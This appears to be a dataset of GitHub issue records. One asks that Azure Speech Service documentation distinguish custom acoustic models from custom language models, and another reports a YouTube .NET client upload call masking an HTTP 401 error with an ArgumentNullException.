https://api.github.com/repos/MicrosoftDocs/azure-docs
|
closed
|
Break out "customizable" into "custom acoustic model" and "custom language model"
|
Pri1 assigned-to-author cognitive-services/svc doc-enhancement speech-service/subsvc triaged
|
The [table at the top of this page](https://docs.microsoft.com/en-us/azure/cognitive-services/speech-service/language-support#speech-to-text) describes which speech-to-text languages support customization, but it is not clear whether "customization" refers to acoustic model customization, language model customization, or both.
The reason for my uncertainty is [this Issue](https://github.com/MicrosoftDocs/azure-docs/issues/37518) which suggests that some languages currently only support one type of customization.
Can you please clarify the type of model customization (acoustic vs. language) that is supported for each language? Thanks!
---
#### Document Details
⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*
* ID: 4de08d1f-8114-7bef-7ef4-022f79c69742
* Version Independent ID: 4c0ceab9-24ed-de01-db30-31acf1de0f48
* Content: [Language support - Speech Service - Azure Cognitive Services](https://docs.microsoft.com/en-us/azure/cognitive-services/speech-service/language-support#feedback)
* Content Source: [articles/cognitive-services/Speech-Service/language-support.md](https://github.com/Microsoft/azure-docs/blob/master/articles/cognitive-services/Speech-Service/language-support.md)
* Service: **cognitive-services**
* Sub-service: **speech-service**
* GitHub Login: @erhopf
* Microsoft Alias: **erhopf**
|
2.0
|
Break out "customizable" into "custom acoustic model" and "custom language model" - The [table at the top of this page](https://docs.microsoft.com/en-us/azure/cognitive-services/speech-service/language-support#speech-to-text) describes which speech-to-text languages support customization, but it is not clear whether "customization" refers to acoustic model customization, language model customization, or both.
The reason for my uncertainty is [this Issue](https://github.com/MicrosoftDocs/azure-docs/issues/37518) which suggests that some languages currently only support one type of customization.
Can you please clarify the type of model customization (acoustic vs. language) that is supported for each language? Thanks!
---
#### Document Details
⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*
* ID: 4de08d1f-8114-7bef-7ef4-022f79c69742
* Version Independent ID: 4c0ceab9-24ed-de01-db30-31acf1de0f48
* Content: [Language support - Speech Service - Azure Cognitive Services](https://docs.microsoft.com/en-us/azure/cognitive-services/speech-service/language-support#feedback)
* Content Source: [articles/cognitive-services/Speech-Service/language-support.md](https://github.com/Microsoft/azure-docs/blob/master/articles/cognitive-services/Speech-Service/language-support.md)
* Service: **cognitive-services**
* Sub-service: **speech-service**
* GitHub Login: @erhopf
* Microsoft Alias: **erhopf**
|
non_defect
|
break out customizable into custom acoustic model and custom language model the describes which speech to text languages support customization but it is not clear whether customization refers to acoustic model customization language model customization or both the reason for my uncertainty is which suggests that some languages currently only support one type of customization can you please clarify the type of model customization acoustic vs language that is supported for each language thanks document details ⚠ do not edit this section it is required for docs microsoft com ➟ github issue linking id version independent id content content source service cognitive services sub service speech service github login erhopf microsoft alias erhopf
| 0
|
15,228
| 11,423,208,852
|
IssuesEvent
|
2020-02-03 15:31:27
|
reservix-ui/marigold
|
https://api.github.com/repos/reservix-ui/marigold
|
closed
|
Setup greenkeper or depandabot
|
infrastructure
|
Or does Github do this now for us???
Also: https://renovatebot.com/
---> check which is the best tool
|
1.0
|
Setup greenkeper or depandabot - Or does Github do this now for us???
Also: https://renovatebot.com/
---> check which is the best tool
|
non_defect
|
setup greenkeper or depandabot or does github do this now for us also check which is the best tool
| 0
|
30,867
| 6,334,342,943
|
IssuesEvent
|
2017-07-26 16:27:12
|
hazelcast/hazelcast
|
https://api.github.com/repos/hazelcast/hazelcast
|
closed
|
[near-cache] Spring Support for NearCache pre-loader
|
Team: Client Team: Core Team: Integration Type: Defect
|
Currently there is no Spring support for Near-Cache preloader. At least I don't see anything in the XSD.
|
1.0
|
[near-cache] Spring Support for NearCache pre-loader - Currently there is no Spring support for Near-Cache preloader. At least I don't see anything in the XSD.
|
defect
|
spring support for nearcache pre loader currently there is no spring support for near cache preloader at least i don t see anything in the xsd
| 1
|
9,469
| 2,615,152,004
|
IssuesEvent
|
2015-03-01 06:29:29
|
chrsmith/reaver-wps
|
https://api.github.com/repos/chrsmith/reaver-wps
|
opened
|
Compile error with gcc 4.6: wpscrack.c:38:30: warning: variable ‘r’ set but not used [-Wunused-but-set-variable]
|
auto-migrated Priority-Triage Type-Defect
|
```
..
wpscrack.c: In function ‘main’:
wpscrack.c:39:6: error: redefinition of ‘ret_val’
wpscrack.c:38:6: note: previous definition of ‘ret_val’ was here
wpscrack.c:38:30: warning: variable ‘r’ set but not used
[-Wunused-but-set-variable]
make: *** [reaver] Error 1
reaver 1.4
```
Original issue reported on code.google.com by `jimbobpa...@gmail.com` on 27 Jan 2012 at 2:05
|
1.0
|
Compile error with gcc 4.6: wpscrack.c:38:30: warning: variable ‘r’ set but not used [-Wunused-but-set-variable] - ```
..
wpscrack.c: In function ‘main’:
wpscrack.c:39:6: error: redefinition of ‘ret_val’
wpscrack.c:38:6: note: previous definition of ‘ret_val’ was here
wpscrack.c:38:30: warning: variable ‘r’ set but not used
[-Wunused-but-set-variable]
make: *** [reaver] Error 1
reaver 1.4
```
Original issue reported on code.google.com by `jimbobpa...@gmail.com` on 27 Jan 2012 at 2:05
|
defect
|
compile error with gcc wpscrack c warning variable ‘r’ set but not used wpscrack c in function ‘main’ wpscrack c error redefinition of ‘ret val’ wpscrack c note previous definition of ‘ret val’ was here wpscrack c warning variable ‘r’ set but not used make error reaver original issue reported on code google com by jimbobpa gmail com on jan at
| 1
|
29,306
| 5,641,777,364
|
IssuesEvent
|
2017-04-06 19:31:15
|
NeoVintageous/NeoVintageous
|
https://api.github.com/repos/NeoVintageous/NeoVintageous
|
opened
|
Use normal mode when other plugins selects text.
|
TYPE: defect
|
<a href="https://github.com/haakenlid"><img src="https://avatars0.githubusercontent.com/u/1686266?v=3" align="left" width="96" height="96" hspace="10"></img></a> **Issue by [haakenlid](https://github.com/haakenlid)**
_Sunday Jun 08, 2014 at 12:49 GMT_
_Originally opened as https://github.com/guillermooo/Vintageous/issues/632_
----
Sublime Text's built-in "Goto Symbol" and Sublimelint's "Goto Lint Error" will select some text and automatically make Vintageous enter visual mode. I find this very annoying and counter-intuitive, because I want to stay in normal mode unless I explicitly need to use visual mode.
Is there some way to automatically exit visual mode when some other plugin selects text on my behalf? Of course I would like to still be able to use the mouse to select text and enter visual mode.
|
1.0
|
Use normal mode when other plugins selects text. - <a href="https://github.com/haakenlid"><img src="https://avatars0.githubusercontent.com/u/1686266?v=3" align="left" width="96" height="96" hspace="10"></img></a> **Issue by [haakenlid](https://github.com/haakenlid)**
_Sunday Jun 08, 2014 at 12:49 GMT_
_Originally opened as https://github.com/guillermooo/Vintageous/issues/632_
----
Sublime Text's built-in "Goto Symbol" and Sublimelint's "Goto Lint Error" will select some text and automatically make Vintageous enter visual mode. I find this very annoying and counter-intuitive, because I want to stay in normal mode unless I explicitly need to use visual mode.
Is there some way to automatically exit visual mode when some other plugin selects text on my behalf? Of course I would like to still be able to use the mouse to select text and enter visual mode.
|
defect
|
use normal mode when other plugins selects text issue by sunday jun at gmt originally opened as sublime text s built in goto symbol and sublimelint s goto lint error will select some text and automatically make vintageous enter visual mode i find this very annoying and counter intuitive because i want to stay in normal mode unless i explicitly need to use visual mode is there some way to automatically exit visual mode when some other plugin selects text on my behalf of course i would like to still be able to use the mouse to select text and enter visual mode
| 1
|
185,245
| 6,720,281,024
|
IssuesEvent
|
2017-10-16 07:05:42
|
asterics/AsTeRICS
|
https://api.github.com/repos/asterics/AsTeRICS
|
opened
|
Update landing page of ARE webserver
|
high priority
|
As of the [webserver document root specification](https://github.com/asterics/AsTeRICS/wiki/AsTeRICS-webserver-document-root-specification) a landing page must be created, which links to all the interesting subpages/webapplications of AsTeRICS.
|
1.0
|
Update landing page of ARE webserver - As of the [webserver document root specification](https://github.com/asterics/AsTeRICS/wiki/AsTeRICS-webserver-document-root-specification) a landing page must be created, which links to all the interesting subpages/webapplications of AsTeRICS.
|
non_defect
|
update landing page of are webserver as of the a landing page must be created which links to all the interesting subpages webapplications of asterics
| 0
|
182,268
| 21,664,495,126
|
IssuesEvent
|
2022-05-07 01:32:41
|
Watemlifts/wagtail
|
https://api.github.com/repos/Watemlifts/wagtail
|
closed
|
WS-2019-0331 (Medium) detected in handlebars-4.0.11.tgz - autoclosed
|
security vulnerability
|
## WS-2019-0331 - Medium Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.0.11.tgz</b></p></summary>
<p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p>
<p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz</a></p>
<p>Path to dependency file: /wagtail/package.json</p>
<p>Path to vulnerable library: wagtail/node_modules/handlebars/package.json</p>
<p>
Dependency Hierarchy:
- jest-22.0.3.tgz (Root Library)
- jest-cli-22.4.4.tgz
- istanbul-api-1.2.1.tgz
- istanbul-reports-1.1.3.tgz
- :x: **handlebars-4.0.11.tgz** (Vulnerable Library)
<p>Found in HEAD commit: <a href="https://github.com/Watemlifts/wagtail/commit/0bda50cc4c9d8ea0cb475001d0de89ff518301eb">0bda50cc4c9d8ea0cb475001d0de89ff518301eb</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
Arbitrary Code Execution vulnerability found in handlebars before 4.5.2. Lookup helper fails to validate templates. Attack may submit templates that execute arbitrary JavaScript in the system.
<p>Publish Date: 2019-11-13
<p>URL: <a href=https://github.com/wycats/handlebars.js/commit/d54137810a49939fd2ad01a91a34e182ece4528e>WS-2019-0331</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 2 Score Details (<b>5.0</b>)</summary>
<p>
Base Score Metrics not available</p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://www.npmjs.com/advisories/1316">https://www.npmjs.com/advisories/1316</a></p>
<p>Release Date: 2019-12-05</p>
<p>Fix Resolution: handlebars - 4.5.2</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
|
True
|
WS-2019-0331 (Medium) detected in handlebars-4.0.11.tgz - autoclosed - ## WS-2019-0331 - Medium Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.0.11.tgz</b></p></summary>
<p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p>
<p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz</a></p>
<p>Path to dependency file: /wagtail/package.json</p>
<p>Path to vulnerable library: wagtail/node_modules/handlebars/package.json</p>
<p>
Dependency Hierarchy:
- jest-22.0.3.tgz (Root Library)
- jest-cli-22.4.4.tgz
- istanbul-api-1.2.1.tgz
- istanbul-reports-1.1.3.tgz
- :x: **handlebars-4.0.11.tgz** (Vulnerable Library)
<p>Found in HEAD commit: <a href="https://github.com/Watemlifts/wagtail/commit/0bda50cc4c9d8ea0cb475001d0de89ff518301eb">0bda50cc4c9d8ea0cb475001d0de89ff518301eb</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
Arbitrary Code Execution vulnerability found in handlebars before 4.5.2. Lookup helper fails to validate templates. Attack may submit templates that execute arbitrary JavaScript in the system.
<p>Publish Date: 2019-11-13
<p>URL: <a href=https://github.com/wycats/handlebars.js/commit/d54137810a49939fd2ad01a91a34e182ece4528e>WS-2019-0331</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 2 Score Details (<b>5.0</b>)</summary>
<p>
Base Score Metrics not available</p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://www.npmjs.com/advisories/1316">https://www.npmjs.com/advisories/1316</a></p>
<p>Release Date: 2019-12-05</p>
<p>Fix Resolution: handlebars - 4.5.2</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
|
non_defect
|
ws medium detected in handlebars tgz autoclosed ws medium severity vulnerability vulnerable library handlebars tgz handlebars provides the power necessary to let you build semantic templates effectively with no frustration library home page a href path to dependency file wagtail package json path to vulnerable library wagtail node modules handlebars package json dependency hierarchy jest tgz root library jest cli tgz istanbul api tgz istanbul reports tgz x handlebars tgz vulnerable library found in head commit a href vulnerability details arbitrary code execution vulnerability found in handlebars before lookup helper fails to validate templates attack may submit templates that execute arbitrary javascript in the system publish date url a href cvss score details base score metrics not available suggested fix type upgrade version origin a href release date fix resolution handlebars step up your open source security game with whitesource
| 0
|
644,732
| 20,986,104,710
|
IssuesEvent
|
2022-03-29 03:27:01
|
EspressoSystems/cape
|
https://api.github.com/repos/EspressoSystems/cape
|
opened
|
Wallet :name parameter
|
bug priority: high wallet security wallet API unplanned
|
The `:name` parameter is used directly as the wallet file name, so this should be changed to something assured to be a valid file name, e.g. no path separators and length supported across platforms Linux, MacOS, and Windows.
|
1.0
|
Wallet :name parameter - The `:name` parameter is used directly as the wallet file name, so this should be changed to something assured to be a valid file name, e.g. no path separators and length supported across platforms Linux, MacOS, and Windows.
|
non_defect
|
wallet name parameter the name parameter is used directly as the wallet file name so this should be changed to something assured to be a valid file name e g no path separators and length supported across platforms linux macos and windows
| 0
|
27,733
| 5,089,560,109
|
IssuesEvent
|
2017-01-01 18:07:58
|
betamaxteam/betamax
|
https://api.github.com/repos/betamaxteam/betamax
|
closed
|
Tapes may not be written for SSL tests
|
defect
|
First test is written; subsequent tapes may not be written. Seems to depend on whether the SSL connection remains open.
Test case: https://gist.github.com/steveims/5536572
|
1.0
|
Tapes may not be written for SSL tests - First test is written; subsequent tapes may not be written. Seems to depend on whether the SSL connection remains open.
Test case: https://gist.github.com/steveims/5536572
|
defect
|
tapes may not be written for ssl tests first test is written subsequent tapes may not be written seems to depend on whether the ssl connection remains open test case
| 1
|
15,564
| 2,860,695,064
|
IssuesEvent
|
2015-06-03 17:00:58
|
dart-lang/sdk
|
https://api.github.com/repos/dart-lang/sdk
|
closed
|
add deprecation msg to web_ui compiler and/or @deprecate on key methods
|
Area-Pkg Pkg-Polymer PolymerMilestone-Later Priority-Low Triaged Type-Defect
|
Polymer (nee web_ui) 0.4 is old and should feel old :)
|
1.0
|
add deprecation msg to web_ui compiler and/or @deprecate on key methods - Polymer (nee web_ui) 0.4 is old and should feel old :)
|
defect
|
add deprecation msg to web ui compiler and or deprecate on key methods polymer nee web ui is old and should feel old
| 1
|
290,904
| 8,909,722,501
|
IssuesEvent
|
2019-01-18 07:34:00
|
exporl/apex
|
https://api.github.com/repos/exporl/apex
|
closed
|
fdroid update
|
High priority
|
fdroid update doesn't seem to work, would be very useful given that there have been many changes recently multiple updates of APEX on tablet have been necessary
|
1.0
|
fdroid update - fdroid update doesn't seem to work, would be very useful given that there have been many changes recently multiple updates of APEX on tablet have been necessary
|
non_defect
|
fdroid update fdroid update doesn t seem to work would be very useful given that there have been many changes recently multiple updates of apex on tablet have been necessary
| 0
|
67,530
| 9,064,380,953
|
IssuesEvent
|
2019-02-14 00:48:50
|
USGS-Astrogeology/ISIS3
|
https://api.github.com/repos/USGS-Astrogeology/ISIS3
|
closed
|
Developer Coding Standards Page std::string for Qt5
|
documentation good first issue wontfix
|
---
Author Name: **Ian Humphrey** (Ian Humphrey)
Original Assignee: Adam Goins
---
*Note: This ticket should be fixed when Qt5 is rolled out into trunk, not any earlier*
On the Developer Coding Standards Page in the [std::string](https://isis.astrogeology.usgs.gov/documents/CodingStandards/CodingStandards.html#std::string) section, the last sentence
~~~
If you need to convert to a const char *, you can also use QString().toAscii().data().
~~~
needs to be changed when Qt5 is rolled out into trunk.
Instead of QString().toAscii().data(), it should be **QString().toLatin1().data()** (since toAscii() is deprecated in Qt5).
|
1.0
|
Developer Coding Standards Page std::string for Qt5 - ---
Author Name: **Ian Humphrey** (Ian Humphrey)
Original Assignee: Adam Goins
---
*Note: This ticket should be fixed when Qt5 is rolled out into trunk, not any earlier*
On the Developer Coding Standards Page in the [std::string](https://isis.astrogeology.usgs.gov/documents/CodingStandards/CodingStandards.html#std::string) section, the last sentence
~~~
If you need to convert to a const char *, you can also use QString().toAscii().data().
~~~
needs to be changed when Qt5 is rolled out into trunk.
Instead of QString().toAscii().data(), it should be **QString().toLatin1().data()** (since toAscii() is deprecated in Qt5).
|
non_defect
|
developer coding standards page std string for author name ian humphrey ian humphrey original assignee adam goins note this ticket should be fixed when is rolled out into trunk not any earlier on the developer coding standards page in the section the last sentence if you need to convert to a const char you can also use qstring toascii data needs to be changed when is rolled out into trunk instead of qstring toascii data it should be qstring data since toascii is deprecated in
| 0
|
8,052
| 2,611,450,195
|
IssuesEvent
|
2015-02-27 04:58:39
|
chrsmith/hedgewars
|
https://api.github.com/repos/chrsmith/hedgewars
|
closed
|
Hedgehog gets trapped inside the explosive
|
auto-migrated Priority-Medium Type-Defect
|
```
What steps will reproduce the problem?
1. Set number of explosives to max and run Hedgewars.
2. Find out if there are three explosives on one level and if there is a
hedgehog between them.
3. Shoot the barrel in the middle.
What is the expected output? What do you see instead?
Sometimes, the hedgehog doesn't bounce of the explosive, but he gets inside it.
You can't move him out of the explosive (I haven't tried to fire a weapon in
this state).
What version of the product are you using? On what operating system?
0.9.13 on Windows XP SP 2
Please provide any additional information below.
```
Original issue reported on code.google.com by `adibiaz...@gmail.com` on 27 Aug 2010 at 12:57
Attachments:
* [Schowek01.bmp](https://storage.googleapis.com/google-code-attachments/hedgewars/issue-18/comment-0/Schowek01.bmp)
|
1.0
|
Hedgehog gets trapped inside the explosive - ```
What steps will reproduce the problem?
1. Set number of explosives to max and run Hedgewars.
2. Find out if there are three explosives on one level and if there is a
hedgehog between them.
3. Shoot the barrel in the middle.
What is the expected output? What do you see instead?
Sometimes, the hedgehog doesn't bounce of the explosive, but he gets inside it.
You can't move him out of the explosive (I haven't tried to fire a weapon in
this state).
What version of the product are you using? On what operating system?
0.9.13 on Windows XP SP 2
Please provide any additional information below.
```
Original issue reported on code.google.com by `adibiaz...@gmail.com` on 27 Aug 2010 at 12:57
Attachments:
* [Schowek01.bmp](https://storage.googleapis.com/google-code-attachments/hedgewars/issue-18/comment-0/Schowek01.bmp)
|
defect
|
hedgehog gets trapped inside the explosive what steps will reproduce the problem set number of explosives to max and run hedgewars find out if there are three explosives on one level and if there is a hedgehog between them shoot the barrel in the middle what is the expected output what do you see instead sometimes the hedgehog doesn t bounce of the explosive but he gets inside it you can t move him out of the explosive i haven t tried to fire a weapon in this state what version of the product are you using on what operating system on windows xp sp please provide any additional information below original issue reported on code google com by adibiaz gmail com on aug at attachments
| 1
|
26,392
| 4,691,315,236
|
IssuesEvent
|
2016-10-11 10:03:57
|
gbif/ipt
|
https://api.github.com/repos/gbif/ipt
|
closed
|
Minor issue: Link to github IPT user manual would be nice, especially for new users of the IPT
|
bug Component-UI Priority-Critical Type-Defect
|
Change the old link at bottom of IPT UI (http://code.google.com/p/gbif-providertoolkit/wiki/IPT2ManualNotes) to the valid one https://github.com/gbif/ipt/wiki
|
1.0
|
Minor issue: Link to github IPT user manual would be nice, especially for new users of the IPT - Change the old link at bottom of IPT UI (http://code.google.com/p/gbif-providertoolkit/wiki/IPT2ManualNotes) to the valid one https://github.com/gbif/ipt/wiki
|
defect
|
minor issue link to github ipt user manual would be nice especially for new users of the ipt change the old link at bottom of ipt ui to the valid one
| 1
|
53,783
| 11,138,499,359
|
IssuesEvent
|
2019-12-20 22:37:12
|
NICMx/Jool
|
https://api.github.com/repos/NICMx/Jool
|
closed
|
Jool crashes when used inside a VM (Jool 4.0.0)
|
Bug: Non-critical Status: Coded
|
Hello,
Jool works well on a physical device but I can't make it work inside a VM, it crashes.
In both cases, I use Jool 4.0.0 with Ubuntu 18.04 4.15.0-45-generic
In both cases also I configure An IPv4 (let's say X.X.X.X), an IPv6 (Y::1/64 for example) for the NAT64 and one /24 IPv4 pool (let's say Y.Y.Y.0/24 here)
The command used are the following:
`$ sudo /sbin/modprobe jool`
`$ sudo jool instance add UCL --iptables --pool6 64:ff9b::/96`
`$ sudo jool -i UCL pool4 add --tcp Y.Y.Y.0/24 10000-14000`
`$ sudo jool -i UCL pool4 add --udp Y.Y.Y.0/24 10000-14000`
`$ sudo jool -i UCL pool4 add --icmp Y.Y.Y.0/24 10000-14000`
`$ sudo ip6tables -t mangle -A PREROUTING --destination 64:ff9b::/96 -j JOOL --instance UCL`
`$ sudo iptables -t mangle -A PREROUTING --destination Y.Y.Y.0/24 -p tcp --dport 10000:14000 -j JOOL --instance UCL`
`$ sudo iptables -t mangle -A PREROUTING --destination Y.Y.Y.0/24 -p udp --dport 10000:14000 -j JOOL --instance UCL`
`$ sudo iptables -t mangle -A PREROUTING --destination Y.Y.Y.0/24 -p icmp -j JOOL --instance UCL`
All command are accepted in both cases, but in the case of the VM, the whole VM crashes as soon as the NAT64 receives its first client to serve (for instance when I ping 64:ff9b::1 from a client device).
The debug messages inside Jool does not show anything special as the VM stops roughly.
From the hypervisor, I can find some error messages related to this specific VM like
"BUG: unable to handle kernel NULL pointer dereference"
"Kernel panic - not syncing: Fatal exception in interrupt"
"Unexpected reschedule of offline CPU#0"
You can find the full logs here : [https://www.dropbox.com/s/ybj4d9arrklq04c/log.txt?dl=1](url)
Thank you for your help
Rémi Floriot
|
1.0
|
Jool crashes when used inside a VM (Jool 4.0.0) - Hello,
Jool works well on a physical device but I can't make it work inside a VM, it crashes.
In both cases, I use Jool 4.0.0 with Ubuntu 18.04 4.15.0-45-generic
In both cases also I configure An IPv4 (let's say X.X.X.X), an IPv6 (Y::1/64 for example) for the NAT64 and one /24 IPv4 pool (let's say Y.Y.Y.0/24 here)
The command used are the following:
`$ sudo /sbin/modprobe jool`
`$ sudo jool instance add UCL --iptables --pool6 64:ff9b::/96`
`$ sudo jool -i UCL pool4 add --tcp Y.Y.Y.0/24 10000-14000`
`$ sudo jool -i UCL pool4 add --udp Y.Y.Y.0/24 10000-14000`
`$ sudo jool -i UCL pool4 add --icmp Y.Y.Y.0/24 10000-14000`
`$ sudo ip6tables -t mangle -A PREROUTING --destination 64:ff9b::/96 -j JOOL --instance UCL`
`$ sudo iptables -t mangle -A PREROUTING --destination Y.Y.Y.0/24 -p tcp --dport 10000:14000 -j JOOL --instance UCL`
`$ sudo iptables -t mangle -A PREROUTING --destination Y.Y.Y.0/24 -p udp --dport 10000:14000 -j JOOL --instance UCL`
`$ sudo iptables -t mangle -A PREROUTING --destination Y.Y.Y.0/24 -p icmp -j JOOL --instance UCL`
All command are accepted in both cases, but in the case of the VM, the whole VM crashes as soon as the NAT64 receives its first client to serve (for instance when I ping 64:ff9b::1 from a client device).
The debug messages inside Jool does not show anything special as the VM stops roughly.
From the hypervisor, I can find some error messages related to this specific VM like
"BUG: unable to handle kernel NULL pointer dereference"
"Kernel panic - not syncing: Fatal exception in interrupt"
"Unexpected reschedule of offline CPU#0"
You can find the full logs here : [https://www.dropbox.com/s/ybj4d9arrklq04c/log.txt?dl=1](url)
Thank you for your help
Rémi Floriot
|
non_defect
|
jool crashes when used inside a vm jool hello jool works well on a physical device but i can t make it work inside a vm it crashes in both cases i use jool with ubuntu generic in both cases also i configure an let s say x x x x an y for example for the and one pool let s say y y y here the command used are the following sudo sbin modprobe jool sudo jool instance add ucl iptables sudo jool i ucl add tcp y y y sudo jool i ucl add udp y y y sudo jool i ucl add icmp y y y sudo t mangle a prerouting destination j jool instance ucl sudo iptables t mangle a prerouting destination y y y p tcp dport j jool instance ucl sudo iptables t mangle a prerouting destination y y y p udp dport j jool instance ucl sudo iptables t mangle a prerouting destination y y y p icmp j jool instance ucl all command are accepted in both cases but in the case of the vm the whole vm crashes as soon as the receives its first client to serve for instance when i ping from a client device the debug messages inside jool does not show anything special as the vm stops roughly from the hypervisor i can find some error messages related to this specific vm like bug unable to handle kernel null pointer dereference kernel panic not syncing fatal exception in interrupt unexpected reschedule of offline cpu you can find the full logs here url thank you for your help rémi floriot
| 0
|
197,478
| 14,927,084,494
|
IssuesEvent
|
2021-01-24 14:09:37
|
SAA-SDT/eac-cpf-schema
|
https://api.github.com/repos/SAA-SDT/eac-cpf-schema
|
closed
|
@mark
|
Attribute EAD3 Reconciliation Tested by Schema Team
|
## Mark
After a discussion around `<list>` #171 , it was decided to use `@style` #242 to encode the character to be used in marking each list entry in an undorded list. Hence `@mark` won't be introduced in EAC-CPF.
--- obsolete ---
Add optional attribute `@mark` with closed lists of predefined values to `<list>`.
Availability: optional
Values: disc, circle, inherit, none, square
May occur within: `<list>`
--- obsolete ---
## Creator of issue
1. Silke Jagodzinski
2. TS-EAS: EAC-CPF subgroup
3. silkejagodzinski@gmail.com
## Related issues / documents
[20200128_SharedSchemaOverview](https://docs.google.com/document/d/1o9mtdzEzNTize7EGvEfKCsFR4ZY_OCVIXZdLDzOJnrY/edit)
## EAD3 Reconciliation
Decision from EAC-EAD-Schema joint meeting, 28 Jan 2020, due to alignment of in both standards.
**Summary:**
For lists with a listtype value "unordered," mark may be used to indicate the character to be used in marking each list entry. Values are drawn from the CSS "list-style-type" property list.
**Values:** disc, circle, inherit, none, square
## Context
EAD3 specific attribute.
## Solution documentation
**Summary:** For lists with a listtype value "unordered", mark may be used to indicate the character to be used in marking each list entry. Values are drawn from the CSS "list-style-type" property list.
**Values:** disc, circle, inherit, none, square
**May occur within**: `<list>`
## Encoding example
```
<generalContext>
<list listType="unordered" mark="circle">
<item>list item, unordered with circle</item>
<item>list item, unorded with circle</item>
</list>
</generalContext>
```
|
1.0
|
@mark - ## Mark
After a discussion around `<list>` #171 , it was decided to use `@style` #242 to encode the character to be used in marking each list entry in an undorded list. Hence `@mark` won't be introduced in EAC-CPF.
--- obsolete ---
Add optional attribute `@mark` with closed lists of predefined values to `<list>`.
Availability: optional
Values: disc, circle, inherit, none, square
May occur within: `<list>`
--- obsolete ---
## Creator of issue
1. Silke Jagodzinski
2. TS-EAS: EAC-CPF subgroup
3. silkejagodzinski@gmail.com
## Related issues / documents
[20200128_SharedSchemaOverview](https://docs.google.com/document/d/1o9mtdzEzNTize7EGvEfKCsFR4ZY_OCVIXZdLDzOJnrY/edit)
## EAD3 Reconciliation
Decision from EAC-EAD-Schema joint meeting, 28 Jan 2020, due to alignment of in both standards.
**Summary:**
For lists with a listtype value "unordered," mark may be used to indicate the character to be used in marking each list entry. Values are drawn from the CSS "list-style-type" property list.
**Values:** disc, circle, inherit, none, square
## Context
EAD3 specific attribute.
## Solution documentation
**Summary:** For lists with a listtype value "unordered", mark may be used to indicate the character to be used in marking each list entry. Values are drawn from the CSS "list-style-type" property list.
**Values:** disc, circle, inherit, none, square
**May occur within**: `<list>`
## Encoding example
```
<generalContext>
<list listType="unordered" mark="circle">
<item>list item, unordered with circle</item>
<item>list item, unorded with circle</item>
</list>
</generalContext>
```
|
non_defect
|
mark mark after a discussion around it was decided to use style to encode the character to be used in marking each list entry in an undorded list hence mark won t be introduced in eac cpf obsolete add optional attribute mark with closed lists of predefined values to availability optional values disc circle inherit none square may occur within obsolete creator of issue silke jagodzinski ts eas eac cpf subgroup silkejagodzinski gmail com related issues documents reconciliation decision from eac ead schema joint meeting jan due to alignment of in both standards summary for lists with a listtype value unordered mark may be used to indicate the character to be used in marking each list entry values are drawn from the css list style type property list values disc circle inherit none square context specific attribute solution documentation summary for lists with a listtype value unordered mark may be used to indicate the character to be used in marking each list entry values are drawn from the css list style type property list values disc circle inherit none square may occur within encoding example list item unordered with circle list item unorded with circle
| 0
|
24,531
| 4,006,426,169
|
IssuesEvent
|
2016-05-12 14:53:48
|
google/google-api-dotnet-client
|
https://api.github.com/repos/google/google-api-dotnet-client
|
closed
|
youtubeService.Videos.Insert() hides exceptions
|
auto-migrated Priority-Medium Type-Defect
|
```
What steps will reproduce the problem?
1. call youtubeService.Videos.Insert() expecting an HTTP 401
2. Check the result of the Insert() call's IUploadProgress.Exception property
Expected result
A reference to an exception related to (and with a message pertaining to) the
HTTP 401 error
Actual result
System.ArgumentNullException: Value cannot be null.
Parameter name: baseUri
at Microsoft.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task task)
at Microsoft.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccess(Task task)
at Microsoft.Runtime.CompilerServices.ConfiguredTaskAwaitable`1.ConfiguredTaskAwaiter.GetResult()
at Google.Apis.Upload.ResumableUpload`1.<UploadCoreAsync>d__e.MoveNext() in
What version of the product are you using?
1.8.1
What is your operating system?
Windows 7
What is your IDE?
VS 2010
What is the .NET framework version?
4
Please provide any additional information below.
Youtube is making me angry by requiring a google plus account.
```
Original issue reported on code.google.com by `TERMINAT...@ogilvy.com` on 8 Apr 2014 at 4:55
|
1.0
|
youtubeService.Videos.Insert() hides exceptions - ```
What steps will reproduce the problem?
1. call youtubeService.Videos.Insert() expecting an HTTP 401
2. Check the result of the Insert() call's IUploadProgress.Exception property
Expected result
A reference to an exception related to (and with a message pertaining to) the
HTTP 401 error
Actual result
System.ArgumentNullException: Value cannot be null.
Parameter name: baseUri
